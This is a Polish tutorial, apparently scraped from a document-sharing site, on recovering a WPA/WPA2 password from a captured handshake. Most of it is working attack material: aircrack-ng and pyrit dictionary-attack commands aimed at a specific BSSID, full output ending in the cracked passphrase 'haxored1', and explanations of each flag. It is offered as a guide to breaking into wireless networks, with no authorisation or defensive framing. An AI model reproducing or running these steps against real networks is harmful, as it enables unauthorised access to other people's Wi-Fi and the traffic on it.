[WiFi] – Ataki na handshake WPA

background image

[

WiFi] – Ataki na handshake

WPA

Ten tutorial jest kontynuacją artykułu dotyczącego

przechwytywania

pakietów z handshake

pokazujący jak łatwo odzyskać hasło lub włamać się

do sieci bezprzewodowej chronionej przez WPA/WPA2.
No dobra, pokażę Ci jak łamać szyfr z handshake. Tak wygląda okno
programu airodump-ng gdy handshake został złapany, ale to już wiesz:

[

CH 1

][

Elapsed: 12 s

][

2011-01-12 17:24

][

WPA handshake:

00:04:ED:A3:80:11

]

BSSID PWR RXQ Beacons

#Data, #/s CH MB ENC CIPHER AUTH ESSID


00:04:

ED:A3:80:11

-53

40 130 27 9 1 54 WPA2 CCMP PSK NASA

BSSID STATION PWR Rate Lost Packets Probes


00:04:

ED:A3:80:11 48:5D:60:34:A8:59 0 0

-54

0 25 NASA

00:04:

ED:A3:80:11 00:4F:78:00:A2:A5

-40

24 - 1 28 25

Skoro już go masz to należy go teraz zepsuć!
Potrzebujemy do tego aircrack-ng żeby zepsuć, psujemy takim to
poleceniem:

aircrack-ng

-w

slownik.txt

-b

00:04:ED:A3:80:11 NASA.cap

[

00:05:48

]

664220

keys tested

(

2100.59 k/s

)

Current passphrase: imakinlazczsupzoR

Master Key : D9 06 78 99 66 B2 50 65 48 E1 99 7B 87 19 5F 7F

45

F8 F9 48 28 A2 7C EF A7 90 E5 5C 80 BC FC 9A

Transient Key : 1B 05 70 73 25 45 7C DB 1E 95 73 37 0C F7 F2 24

26 56

DD 2C 8B 09 0F 58 57 5F D8 4A EA D3 94 83

BC 48 F8 1E 84 4A 92 46 19 C3 48 BC 7B 21 6D 16
C3 19 AD 27 14 D0 76 33 44 32 65 FE 1F 8D 97 6C

EAPOL HMAC : 05 46 D3 00 99 FC A8 82 F8 CF C1 2B EC 87 F4 5F

W poleceniu użyto opcji ataku słownikowego, ponieważ mam bardzo duży
słownik to często go używam

Aircrack-ng 1.0

[

00:11:45

]

8914110

keys tested

(

2041.75 k/s

)

KEY FOUND!

[

haxored1

]

Master Key : C6 AC CD E4 AF 58 CA 8A 51 8E C4 BC A1 50 F9 DE

72 55 48

F6 E1 6F 26 23 2C 7F AA E6 8A 7F 98 6C

Transient Key : 86 CA 39 4F C6 9A C2 CD 2D 06 0F E9 83 E6 DE FC

3

F 24 70 D0 0C F6 B8 44 FB FE D5 5A 03 CF D3 94

background image

06 90

AC C7 7F 41 EF DE DA 8D 72 89 B2 82 A3 4C

F1 69 2F E3 59 B9 73 1E A1 AF 67 57 DA 16 8A 11

EAPOL HMAC : 83 55 E7 96 C4 C4 96 C2 32 AF 5D 9B 40 81 AC F5

Zróbmy to szybciej!
W jednym z moich poprzednich tutoriali pokazywałem jak zainstalować
pyrit wraz z cpyrit dla kart ATI z OCL.
Użyjemy teraz projektu z Summer Google Code do ataku na handshake.
Narzędzie pyrit do tego ataku użyje mocy obliczeniowej CPU+GPU (u mnie
jest to i7 740QM + ATI HD5730)
Proszę pamiętać, że pyrit to narzędzie do doświadczeń crackingu (słowa
developera narzędzia).
Sprawdzamy czy w przechwyconych przez nas pakietach pyrit wykrywa
dane handshake.

$

pyrit

-r

NASA-01.cap analyze

Pyrit 0.4.0-dev

(

svn

r288

)

(

C

)

2008-2010 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+
Parsing

file

'NASA-01.cap'

(

1/1

)

...

Parsed 7 packets

(

7 802.11-packets

)

, got 1 AP

(

s

)

#1:

AccessPoint 00:04:ed:a3:80:11 ('NASA'):

#1:

Station 00:1f:e1:02:dc:9e

#2:

Station 00:4f:78:00:a2:a5, 1 handshake(s):

#1:

HMAC_SHA1_AES, good, spread 1

#3:

Station 48:5d:60:34:a8:59

No skoro wykrywa to dowiedzmy się jakie jest hasło:

$

pyrit

-r

NASA-01.cap

-i

slownik.txt

-b

00:04:ED:A3:80:11 attack_passthrough

Pyrit 0.4.0-dev

(

svn

r288

)

(

C

)

2008-2010 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+
Parsing

file

'NASA-01.cap'

(

1/1

)

...

Parsed 7 packets

(

7 802.11-packets

)

, got 1 AP

(

s

)

Tried 120006 PMKs so far; 12304 PMKs per second.

The password is

'haxored1'

.

pyrit

-r

NASA-01.cap

-i

slownik.txt

-b

00:04:ED:A3:80:11 attack_passthrough

-

r plik cap.

-

i podajemy ścieżkę do słownika, który chcesz przeszukać za hasłem

-

b <tutaj_bssid>

na końcu polecenia podaje się jaki ma być atak, dictionary-attack opisany

jest jakoattack_passthrough

Komentarz od-autorski:
Nie, nie warto używać tęczowych tablic do ataków na WPA/WPA2, stracisz

background image

miesiące (lata?) na tworzenie takich tablic, hasło w tym czasie może
zostać zmienione, wtedy ponownie będzie trzeba uzyskać handshake. W
tym wypadku słowniki są najlepszym rozwiązaniem.


Document Outline


Wyszukiwarka

Podobne podstrony:
[WiFi] – Ataki na handshake WPA
ataki na sieci wifi
Ataki na kryptograficzne funkcje skrótu
ataki na lan przez stp vovcia
Ataki na Merkel, Polska dla Polaków, Grabież i niszczenie Polski-perfidia i konsekwencja
10 Ataki na implementacje algorytmu RSA
Kolejne medialne ataki na Radio Maryja (2011 07 26)
WiFi] – Łapanie Hand Shake WPA
[WiFi] – Łapanie Hand Shake WPA
ATAKI TERRORYSTYCZNE NA TRANSPORTLOTNICZY
W rejonach górskich Małopolski rolnicy coraz częściej celowo narażają hodowane przez siebie zwierzęt
Ataki XSS oraz CSRF na aplikacje internetowe
Ebook 100 Sposobów Na Bezpieczeństwo Sieci, Network, Lan, Wan, Man, Wifi, Security, Hacking, Intern

więcej podobnych podstron